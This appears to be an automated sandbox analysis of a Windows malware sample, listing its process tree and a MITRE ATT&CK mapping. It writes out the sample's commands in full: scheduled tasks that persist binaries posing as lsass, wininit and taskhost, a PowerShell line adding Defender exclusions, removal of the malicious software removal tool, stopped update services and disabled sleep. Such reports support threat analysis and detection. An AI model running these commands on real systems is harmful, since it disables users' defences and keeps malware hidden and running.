schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\ChainReview\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoofH" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoof" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HpsrSpoofH" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2816

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-773678924-929680820-1287851861-18174454681248330185-368507238-20356791932118806639"
1⤵
PID:3016

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:1732
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1988
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2136
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2568
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2800
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1492
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2864
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2096
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2900
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1652
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:108
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery